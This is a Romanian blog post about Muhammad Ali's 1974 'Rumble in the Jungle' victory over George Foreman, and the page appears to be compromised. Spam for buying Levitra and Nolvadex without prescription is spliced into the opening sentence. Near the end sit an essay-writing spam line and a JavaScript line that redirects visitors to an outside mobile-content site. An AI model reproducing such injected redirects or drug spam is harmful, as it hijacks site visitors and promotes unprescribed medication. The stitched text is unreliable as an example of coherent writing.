Pe 30 octombrie…

buy brand levitra online get levitra free where to Buy Levitra levitra patent levitra buy online uk how to Buy Levitra no prescription levitra blog levitra blood pressure …in 1974, avea loc in Zair “Meciul de box al secolului XX”. Purchase Discount Medication! buy Nolvadex online Without Prescription. Top Offering, buy Nolvadex online In Australia.

EVENIMENT Pe 30 octombrie 1974 Muhammad Ali îşi recâştiga titlul de campion la categoria grea după un meci dur şi spectaculos cu mult mai tânărul George Foreman. Lupta, botezată “Rumble in the Jungle” este şi astăzi considerată cea mai bună din istoria boxului, o lecţie despre strategie, voinţă şi muncă.

aliforeman

Multi comentatori credeau ca Muhammad Ali, atunci in varsta de 32 de ani, se afla la finalul carierei si ca va fi infrant de tanarul George Foreman, campionul en titre la categoria grea. Cei mai multi pariau pe Foreman pentru ca nu avea nici un meci pierdut si, din cele 40 de meciuri castigate, 37 fusesera castigate prin knock out, iar ultimele opt au durat mai putin de sase minute. In plus, castigase in fata lui Joe Frazier si a lui Ken Norton, doi dintre boxerii care il invinsesera pe Muhammad Ali cu cativa ani in urma. Comentatorii credeau ca Ali avea si dezavantajul celor trei ani de pauza (1967- 1970) cand a fost suspendat pentru ca a refuzat sa faca armata. Dupa ce si-a recastigat licenta in 1970, dar a pierdut titlul de campion in fata lui Joe Frazier in 1971, Ali a fost nevoit sa lupte cu boxeri mai putin importanti pentru a putea ajunge in postura in care sa-l provoace pe Frazier si sa-si recastige titlul. Dupa ani de lupte, Ali a vazut cum Frazier si-a pierdut titlul in favoarea lui George Foreman, care l-a pus la podea in doar doua reprize. Ali a fost nevoit sa il provoace pe George Foreman si astfel s-a ajuns la “Rumble in the Jumble”, meci programat initial in septembrie 1974, dar amanat cu o luna din cauza unui accident suferit de Foreman. Lupta a avut loc in Zair –  singura tara dispusa sa sponsorizeze evenimentul. Inaintea meciului, Ali l-a invins pe Foreman la capitolul popularitate si promovare, care au ajuns sa ii afecteze acestuia psihicul de nezdruncinat pana atunci. Ca de fiecare data, Ali avea o strategie care s-a dovedit infailibila. L-a lovit in prima runda pe Foreman pana l-a ametit, apoi s-a retras si l-a lasat pe acesta sa loveasca, aparandu-se de fiecare data. Dupa a treia runda Foreman era obosit, pentru ca nu mai luptase de mult mai mult de sase minute. Sapte runde au fost un set de lovituri date sau primite de Foreman dupa cum vroia Ali, insa chiar daca acesta era de neclintit, nu parea ca il va dobori pe tanarul sau adversar. Insa lumea a inteles totul in runda a opta, cand Ali l-a lasat pe Foreman sa il loveasca puternic, dupa care, impins de corzi, l-a atacat cu doua directe de dreapta calculate la minut, un croseu de stanga, urmat de o alta directa de dreapta, lovituri dupa care Foreman a cazut la podea invartindu-se. Si astfel Ali a demonstrat lumii ca este “the greatest”, asa cum ii placea lui sa spuna. Cei doi campioni au devenit prieteni foarte buni dupa acest meci, Foreman fiind alaturi de Ali in multe momente importante din viata sa.

quick essay writing help

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *